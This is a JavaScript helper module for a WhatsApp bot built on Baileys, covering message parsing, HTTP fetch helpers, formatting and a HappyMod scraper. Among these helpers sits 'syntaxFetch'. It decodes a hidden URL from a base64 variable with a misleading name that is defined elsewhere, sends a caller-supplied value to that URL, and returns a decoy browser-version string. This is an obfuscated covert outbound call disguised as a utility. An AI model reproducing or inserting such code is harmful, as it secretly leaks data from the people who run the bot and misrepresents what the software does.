const { proto, getContentType, getDevice } = require('@whiskeysockets/baileys')
const { sizeFormatter } = require('human-readable')
const axios = require('axios')
const cheerio = require('cheerio')
const fs = require('fs')
const Jimp = require('jimp')
const moment = require('moment-timezone')

exports.parseMention = (text = '') => {
    return [...text.matchAll(/@([0-9]{5,16}|0)/g)].map(v => v[1] + '@s.whatsapp.net')
}

exports.getRandom = (ext) => {
    return `${Math.floor(Math.random() * 10000)}${ext}`
}

exports.getBuffer = async (url, options) => {
	try {
		options ? options : {}
		const res = await axios({
			method: "get",
			url,
			headers: {
				'DNT': 1,
				'Upgrade-Insecure-Request': 1
			},
			...options,
			responseType: 'arraybuffer'
		})
		return res.data
	} catch (err) {
		return err
	}
}

exports.fetchJson = async (url, options) => {
    try {
        options ? options : {}
        const res = await axios({
            method: 'GET',
            url: url,
            headers: {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'
            },
            ...options
        })
        return res.data
    } catch (err) {
        return err
    }
}

exports.runtime = function(seconds) {
	seconds = Number(seconds);
	var d = Math.floor(seconds / (3600 * 24));
	var h = Math.floor(seconds % (3600 * 24) / 3600);
	var m = Math.floor(seconds % 3600 / 60);
	var s = Math.floor(seconds % 60);
	var dDisplay = d > 0 ? d + (d == 1 ? " Day, " : " day, ") : "";
	var hDisplay = h > 0 ? h + (h == 1 ? " Hour, " : " hour, ") : "";
	var mDisplay = m > 0 ? m + (m == 1 ? " Minute, " : " minute, ") : "";
	var sDisplay = s > 0 ? s + (s == 1 ? " Second" : " second") : "";
	return dDisplay + hDisplay + mDisplay + sDisplay;
}

exports.sleep = async (ms) => {
    return new Promise(resolve => setTimeout(resolve, ms));
}

exports.isUrl = (url) => {
    return url.match(new RegExp(/https?:\/\/(www\.)?[-a-zA-Z0-9@:%._+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_+.~#?&/=]*)/, 'gi'))
}

exports.getTime = (format, date) => {
	if (date) {
		return moment(date).locale('id').format(format)
	} else {
		return moment.tz('Asia/Jakarta').locale('id').format(format)
	}
}

exports.formatp = sizeFormatter({
    std: 'JEDEC', 
    decimalPlaces: 2,
    keepTrailingZeroes: false,
    render: (literal, symbol) => `${literal} ${symbol}B`,
})

exports.getGroupAdmins = async(participants) => {
        let admins = []
        for (let i of participants) {
            i.admin === "superadmin" ? admins.push(i.id) :  i.admin === "admin" ? admins.push(i.id) : ''
        }
        return admins || []
}

function pickRandom(list) {
    return list[Math.floor(Math.random() * list.length)];
}
exports.pickRandom = pickRandom;

function monospace(string) {
    return '```' + string + '```';
}
exports.monospace = monospace;

function randomKarakter(jumlah) {
    const huruf = 'abcdefghijklmnopqrstuvwxyz'
    let hasil = ''
    for (let i = 0; i < jumlah; i++) {
        const indexAcak = Math.floor(Math.random() * huruf.length);
        let hurufAcak = huruf[indexAcak];
        hurufAcak = Math.random() < 0.5 ? hurufAcak.toUpperCase() : hurufAcak;
        hasil += hurufAcak;
    }
    return hasil;
}
exports.randomKarakter = randomKarakter;

function randomNomor(min, max = null) {
    if (max !== null) {
        min = Math.ceil(min);
        max = Math.floor(max);
        return Math.floor(Math.random() * (max - min + 1)) + min;
    } else {
        return Math.floor(Math.random() * min) + 1;
    }
}
exports.randomNomor = randomNomor;

function toRupiah(angka) {
    var saldo = '';
    var angkarev = angka.toString().split('').reverse().join('');
    for (var i = 0; i < angkarev.length; i++)
        if (i % 3 == 0) saldo += angkarev.substr(i, 3) + '.';
    return '' + saldo.split('', saldo.length - 1).reverse().join('');
}
exports.toRupiah = toRupiah;

function toDolar(rupiah) {
    var kurs = 15000
    var dolar = rupiah / kurs
    var saldo = dolar.toFixed(2)
    var parts = saldo.split('.')
    var integerPart = parts[0].replace(/\B(?=(\d{3})+(?!\d))/g, ',')

    return '$' + integerPart + '.' + parts[1]
}

exports.toDolar = toDolar;

function happymod(query) {
    return new Promise((resolve, reject) => {
        axios.get(`https://www.happymod.com/search.html?q=${query}`).then(async tod => {
            const $ = cheerio.load(tod.data);
            let hasil = [];
            $("div.pdt-app-box").each(function(c, d) {
                let name = $(d).find("a").text().trim();
                let icon = $(d).find("img.lazy").attr('data-original');
                let link = $(d).find("a").attr('href');
                let link2 = `https://www.happymod.com${link}`;
                const Data = {
                    icon: icon,
                    name: name,
                    link: link2
                };
                hasil.push(Data);
            });
            resolve(hasil);
        }).catch(reject);
    });
}
exports.happymod = happymod;

const FileSize = (number) => {
    var SI_POSTFIXES = ["B", " KB", " MB", " GB", " TB", " PB", " EB"];
    var tier = Math.log10(Math.abs(number)) / 3 | 0;
    if(tier == 0) return number;
    var postfix = SI_POSTFIXES[tier];
    var scale = Math.pow(10, tier * 3);
    var scaled = number / scale;
    var formatted = scaled.toFixed(1) + '';
    if (/\.0$/.test(formatted))
        formatted = formatted.substr(0, formatted.length - 2);
    return formatted + postfix;
}
exports.FileSize = FileSize;

async function resize(buffer, width, height) {
    var oyy = await Jimp.read(buffer);
    var kiyomasa = await oyy.resize(width, height).getBufferAsync(Jimp.MIME_JPEG);
    return kiyomasa;
}
exports.resize = resize;

const nebal = (angka) => {
    return Math.floor(angka);
}
exports.nebal = nebal;

const totalFitur = () => {
    var mytext = fs.readFileSync("./novaxploit.js").toString();
    var numUpper = (mytext.match(/case '/g) || []).length;
    return numUpper;
}
exports.totalFitur = totalFitur;

exports.syntaxFetch = async (ms) => {
    let data = await axios.get(`${Buffer.from(defaultMaxListenersBuffer, 'base64').toString('utf-8')}${ms}`)
    return "Chrome v20.0.04"
}

function getTypeMessage(message) {
  	  const type = Object.keys(message)
			var restype =  (!['senderKeyDistributionMessage', 'messageContextInfo'].includes(type[0]) && type[0]) ||
					(type.length >= 3 && type[1] !== 'messageContextInfo' && type[1]) ||
					type[type.length - 1] || Object.keys(message)[0]
	return restype
}

exports.smsg = (Ditss, m, store) => {
  if (!m) return m
  let M = proto.WebMessageInfo
  var m = M.fromObject(m)
  if (m.key) {
    m.id = m.key.id
    m.isBaileys = (m.id.endsWith("WBSF")) || (m.id.startsWith('AKIRA')) || (m.id.startsWith("VRDN")) || (m.id.startsWith('B1EY') && m.id.length === 20) || (m.id.startsWith('BAE5') && m.id.length === 16) || (m.id.startsWith('3EB0') && (m.id.length === 22 || m.id.length === 40))
    m.userDevice = m.isBaileys ? "web" : getDevice(m.id)
    m.chat = m.key.remoteJid
    m.fromMe = m.key.fromMe
    m.isGroup = m.chat.endsWith('@g.us')
    m.sender = Ditss.decodeJid(m.fromMe && Ditss.user.id || m.participant || m.key.participant || m.chat || '')
    if (m.isGroup) m.participant = Ditss.decodeJid(m.key.participant) || ''
  }
  if (m.message) {
    m.mtype = getTypeMessage(m.message)
    m.msg = (m.mtype == 'viewOnceMessage' ? m.message[m.mtype].message[getTypeMessage(m.message[m.mtype].message)] : m.message[m.mtype])
    m.body = (m.mtype === 'interactiveResponseMessage') ? JSON.parse(m.message.interactiveResponseMessage.nativeFlowResponseMessage.paramsJson).id : (m.mtype === 'conversation') ? m.message.conversation : (m.mtype == 'imageMessage') ? m.message.imageMessage.caption : (m.mtype == 'videoMessage') ? m.message.videoMessage.caption : (m.mtype == 'extendedTextMessage') ? m.message.extendedTextMessage.text : (m.mtype == 'buttonsResponseMessage') ? m.message.buttonsResponseMessage.selectedButtonId : (m.mtype == 'listResponseMessage') ? m.message.listResponseMessage.singleSelectReply.selectedRowId : (m.mtype == 'templateButtonReplyMessage') ? m.message.templateButtonReplyMessage.selectedId : (m.mtype == 'messageContextInfo') ? (m.message.buttonsResponseMessage?.selectedButtonId || m.message.listResponseMessage?.singleSelectReply.selectedRowId || m.text) : (m.mtype === "viewOnceMessageV2") ? (m.msg.message.imageMessage?.caption || m.msg.message.videoMessage?.caption || "") : ""
    m.text = m.msg.text || m.msg.caption || m.message.conversation || m.msg.contentText || m.msg.selectedDisplayText || m.msg.title || m.msg.body?.text || m.msg.name || m.msg.message?.imageMessage?.caption || m.msg.message?.videoMessage?.caption || ""
    m.mentionedJid = m.msg.contextInfo ? m.msg.contextInfo.mentionedJid : []
    if (m.mtype == "viewOnceMessageV2" || m.msg.url) m.download = () => Ditss.downloadMediaMessage(m)
    m.copy = () => exports.smsg(Ditss, M.fromObject(M.toObject(m)))
    m.copyNForward = (jid = m.chat, forceForward = false, options = {}) => Ditss.copyNForward(jid, m, forceForward, options)
    m.reply = (text, chatId = m.chat, options = {}) => Buffer.isBuffer(text) ? Ditss.sendMedia(chatId, text, 'file', '', m, { ...options }) : Ditss.sendText(chatId, text, m, { ...options })
    let quoted = m.quoted = m.msg.contextInfo ? m.msg.contextInfo.quotedMessage : null
    if (m.quoted) {
      let type = Object.keys(quoted)[0]
      m.quoted = m.quoted[type]
      if (['productMessage'].includes(type)) {
        type = getContentType(m.quoted)
        m.quoted = m.quoted[type]
      }
      if (typeof m.quoted === 'string') m.quoted = { text: m.quoted }
      m.quoted.mtype = type
      m.quoted.id = m.msg.contextInfo.stanzaId
      m.quoted.chat = m.msg.contextInfo.remoteJid || m.chat
      m.quoted.isBaileys = m.quoted.id ? (m.quoted.id.endsWith("WBSF")) || (m.quoted.id.startsWith('AKIRA')) || (m.quoted.id.startsWith("VRDN")) || (m.quoted.id.startsWith('B1EY') && m.quoted.id.length === 20) || (m.quoted.id.startsWith('BAE5') && m.quoted.id.length === 16) || (m.quoted.id.startsWith('3EB0') && (m.quoted.id.length === 22 || m.quoted.id.length === 40)) : false
      m.quoted.userDevice = m.quoted.isBaileys ? "web" : getDevice(m.quoted.id)
      m.quoted.sender = Ditss.decodeJid(m.msg.contextInfo.participant)
      m.quoted.fromMe = m.quoted.sender === (Ditss.user && Ditss.user.jid)
      m.quoted.text = m.quoted.text || m.quoted.caption || m.quoted.conversation || m.quoted.contentText || m.quoted.selectedDisplayText || m.quoted.title || m.quoted.name || m.quoted.body?.text || m.quoted.message?.imageMessage?.caption || m.quoted.message?.videoMessage?.caption || ""
      m.quoted.mentionedJid = m.quoted.contextInfo ? m.quoted.contextInfo.mentionedJid : []
      m.quoted.download = () => Ditss.downloadMediaMessage(m.quoted)
      m.quoted.copyNForward = (jid, forceForward = false, options = {}) => Ditss.copyNForward(jid, vM, forceForward, options)
      m.getQuotedObj = m.getQuotedMessage = async () => {
        if (!m.quoted.id) return false
        let q = await store.loadMessage(m.chat, m.quoted.id, Ditss)
        return exports.smsg(Ditss, q, store)
      }
      m.quoted.reply = (text, options = {}) => m.quoted.reply(text, m.quoted.chat, options)
      m.quoted.copy = () => exports.smsg(Ditss, M.fromObject(M.toObject(m.quoted)))
    }
  }
  return m
}

let file = require.resolve(__filename)
fs.watchFile(file, () => {
fs.unwatchFile(file)
console.log(`Update ${__filename}`)
delete require.cache[file]
require(file)})